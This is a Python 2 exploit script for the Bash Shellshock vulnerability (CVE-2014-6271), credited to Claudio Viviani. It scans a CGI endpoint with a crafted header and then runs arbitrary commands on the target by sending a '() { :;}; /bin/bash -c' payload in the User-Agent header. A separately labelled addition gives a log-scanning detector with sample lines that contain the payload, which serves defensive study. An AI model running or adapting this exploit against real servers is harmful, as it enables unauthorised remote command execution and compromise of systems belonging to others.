Gnu Bash 4.3 CGI Scan Remote Command Injection
Source: http://www.homelab.it  Author: Viviani  Published: 2014-09-28
#!/usr/bin/env python

# http connection
import urllib2
# Args management
import optparse
# Error management
import sys

banner = """
      _______                 _______             __
     |   _   .-----.--.--.   |   _   .---.-.-----|  |--.
     |.  |___|     |  |  |   |.  1   |  _  |__ --|     |
     |.  |   |__|__|_____|   |.  _   |___._|_____|__|__|
     |:  1   |               |:  1    \
     |::.. . |               |::.. .  /
     `-------'               `-------'
      ___ ___   _______     _______ _______ ___
     |   Y   | |   _   |   |   _   |   _   |   |
     |   |   |_|___|   |   |.  l   |.  1___|.  |
     |____   |___(__   |   |.  _   |.  |___|.  |
         |:  | |:  1   |   |:  |   |:  1   |:  |
         |::.| |::.. . |   |::.|:. |::.. . |::.|
         `---' `-------'   `--- ---`-------`---'

                              Gnu B4sh <= 4.3 Cg1 Sc4n + r3m0t3 C0mm4nd Inj3ct10n

          ==========================================
          - Release date: 2014-09-25
          - Discovered by: Stephane Chazelas
          - CVE: 2014-6271
          ===========================================

                        Written by:

                      Claudio Viviani

                   http://www.homelab.it

                      info@homelab.it
                  homelabit@protonmail.ch

             https://www.facebook.com/homelabit
                https://twitter.com/homelabit
             https://plus.google.com/+HomelabIt1/
   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    else:
        return url

def connectionScan(url):
    print '[+] Checking for vulnerability...'
    try:
        headers = {"VULN" : "() { :;}; echo 'H0m3l4b1t: YES'"}
        response = urllib2.Request(url, None, headers)
        content = urllib2.urlopen(response)
        if 'H0m3l4b1t' in  content.info():
            print '[!] VULNERABLE: '+url
        else:
            print '[X] NOT Vulnerable'
    except urllib2.HTTPError, e:
        print e.info()
        # 404 is the "Not Found" status that matches the message below
        if e.code == 404:
            print '[X] Page not found'
        else:
            print '[X] HTTP Error'
    except urllib2.URLError:
        print '[X] Connection Error'

def connectionInje(url,cmd):
    try:
        headers = { 'User-Agent' : '() { :;}; /bin/bash -c "'+cmd+'"' }
        response = urllib2.Request(url, None, headers)
        content = urllib2.urlopen(response).read()
        print '[!] '+cmd+' command sent!'
    except urllib2.HTTPError, e:
        if e.code == 500:
            print '[!] '+cmd+' command sent!!!'
        else:
            print '[!] command not sent :('
    except urllib2.URLError:
        print '[X] Connection Error'

commandList = optparse.OptionParser('usage: %prog [-s] -t http://localhost/cgi-bin/test -c "touch /tmp/test.txt"')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-c', '--cmd', action="store",
                  help="Insert command name",
                  )
commandList.add_option('-s', '--scan', default=False, action="store_true",
                  help="Scan Only",
                  )
options, remainder = commandList.parse_args()

# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)
elif options.target and not options.cmd and not options.scan:
    print(banner)
    commandList.print_help()
    sys.exit(1)

print(banner)

url = checkurl(options.target)
cmd = options.cmd
if options.scan:
    print '[+] Scan Only Mode'
    connectionScan(url)
else:
    print '[+] Remote Command Injection Mode'
    connectionScan(url)
    connectionInje(url,cmd)
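
A detection-side counterpart, added here and not part of Viviani's script: a Python 3 scan of combined-format access log lines for Referer or User-Agent values that begin with a bash function definition, which is how the User-Agent payload in connectionInje is recorded. The log lines, addresses and the function name find_function_def_headers are constructed for this example.

```python
import re

# Apache/nginx "combined" log format; quoted fields may contain \" escapes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ '
    + QUOTED + ' ' + QUOTED
)
# A header value that starts with a bash function definition, "() {",
# the prefix used by CVE-2014-6271 payloads.
FUNC_DEF = re.compile(r'^\s*\(\s*\)\s*\{')

def find_function_def_headers(lines):
    """Return one dict per logged Referer/User-Agent value matching FUNC_DEF."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format; skipped rather than guessed at
        ip, ts, request, status, referer, agent = m.groups()
        for field, value in (("referer", referer), ("user-agent", agent)):
            if FUNC_DEF.match(value):
                hits.append({
                    "ip": ip, "time": ts, "request": request,
                    "status": int(status), "field": field,
                    # undo the log writer's \" escaping for display
                    "value": value.replace('\\"', '"'),
                })
    return hits

# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    # ordinary browser request
    r'192.0.2.10 - - [28/Sep/2014:10:00:01 +0000] "GET /cgi-bin/test HTTP/1.1" '
    r'200 312 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    # scan probe: its payload travels in the custom VULN header, which the
    # combined format does not record, so only urllib2's default agent shows
    r'198.51.100.7 - - [28/Sep/2014:10:00:04 +0000] "GET /cgi-bin/test HTTP/1.1" '
    r'200 312 "-" "Python-urllib/2.7"',
    # injection request: payload in User-Agent, answered with HTTP 500
    r'198.51.100.7 - - [28/Sep/2014:10:00:05 +0000] "GET /cgi-bin/test HTTP/1.1" '
    r'500 530 "-" "() { :;}; /bin/bash -c \"touch /tmp/test.txt\""',
]

if __name__ == "__main__":
    for hit in find_function_def_headers(SAMPLE_LOG):
        print("[!] {ip} {time} {field} status={status}: {value}".format(**hit))
```

Only the third line is flagged: the VULN-header probe leaves no payload in a default access log, so catching it needs full request-header logging (for example Apache's mod_log_forensic) or inspection at a proxy or WAF.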
